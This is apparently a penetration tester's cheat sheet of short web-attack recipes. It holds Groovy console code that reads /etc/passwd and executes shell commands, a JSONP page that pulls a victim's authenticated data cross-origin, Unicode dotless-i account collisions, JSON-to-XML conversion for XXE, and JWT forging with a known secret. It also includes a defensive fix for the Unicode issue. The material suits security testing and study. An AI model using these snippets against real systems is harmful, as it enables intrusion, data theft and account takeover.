xct's notes

Groovy Script Console

File-Read

```groovy
new File("/etc/passwd").withReader('UTF-8') { reader ->
    def line
    while ((line = reader.readLine()) != null) {
        println "${line}"
    }
}
```

RCE

```groovy
def process = "ls -lah".execute()
println "${process.text}"
```

```groovy
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ls -lah'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000) // wait up to 1 s for the command, then kill it
println "$sout"
```

JsonP

Only useful if a JSONP endpoint requires authentication. A victim visiting attacker.com retrieves the data from victim.com, and the browser sends the victim's cookies along because JSONP loads the endpoint as a cross-origin `<script>` (Reference: https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/). Browsers that treat cookies as SameSite=Lax by default (Chrome since 2020) will not attach them to this cross-site script load unless the cookie is explicitly set with SameSite=None; Secure.
```html
<html>
<body>
<script>
function xct(a) {
  alert(JSON.stringify(a));
}
</script>
<script src="targeturl?callback=xct"></script>
</body>
</html>
```

Unicode Abuse

Some Unicode characters, such as the dotless i (ı, U+0131), are mapped onto plain ASCII letters by "toUpperCase()". A registration check that compares case-folded strings can therefore treat a look-alike address as equal to an existing one, for example the admin email address. Reference: https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
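As an added illustration, not from the original notes, the following Node.js snippet shows the dotless-i collision under toUpperCase() and the ASCII-only fold a registration check should use instead so that look-alikes cannot collapse onto an existing identifier. The addresses are constructed for the example.

```javascript
// Added example: Unicode case mapping vs. an ASCII-only case fold.
// Strings below are constructed; "adm\u0131n" uses U+0131 (dotless i).
const REGISTERED = "admin@example.com";
const LOOKALIKE = "adm\u0131n@example.com";

// Naive comparison: Unicode uppercases U+0131 to "I", so both sides collide.
function naiveMatch(a, b) {
  return a.toUpperCase() === b.toUpperCase();
}

// Fold only ASCII letters A-Z; every other code point is left untouched,
// so a non-ASCII look-alike can never become equal to an ASCII identifier.
function asciiFold(s) {
  return s.replace(/[A-Z]/g, (c) => c.toLowerCase());
}

function safeMatch(a, b) {
  return asciiFold(a) === asciiFold(b);
}

// Stricter option for identifiers such as the local part of an e-mail:
// reject anything outside printable ASCII before any comparison.
function isAsciiOnly(s) {
  return /^[\x21-\x7e]+$/.test(s);
}

// Demo: the naive check is fooled, the ASCII fold and the allow-list are not.
console.log("naive  :", naiveMatch(REGISTERED, LOOKALIKE)); // true
console.log("folded :", safeMatch(REGISTERED, LOOKALIKE)); // false
console.log("ascii? :", isAsciiOnly(LOOKALIKE)); // false
```

The fold still gives the intended case-insensitivity for ASCII input ("Admin@Example.com" matches "admin@example.com"); it only refuses to equate characters that are not literally the same ASCII letter.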

Json to XML

Change JSON POST requests to XML format; sometimes the server accepts and parses it, which can then be used for XXE, e.g. https://twitter.com/11xuxx/status/1250764273623629826

HTTP/3 Clients

```shell
docker run -it 'ymuski/curl-http3' bash
```

Reference: curl/HTTP3.md at master · curl/curl (GitHub)

Interactive Shell from Web Shell

GitHub - mxrch/webwrap: Give me a web shell, I'll give you a terminal. 🌯

Timeless Timing Attacks against Remote Targets

The idea is to use HTTP/2 to pack multiple requests into a single connection so they reach the server at effectively the same moment. Instead of measuring absolute response times, which network jitter makes unreliable, we only look at which response comes back first. Repeat this many times to get statistical significance.

Create JWT from Secret Key via PyJWT

```python
import jwt

data = {"data": {"username": "xct"}}
print(jwt.encode(data, "6cb9...", algorithm="HS256"))
```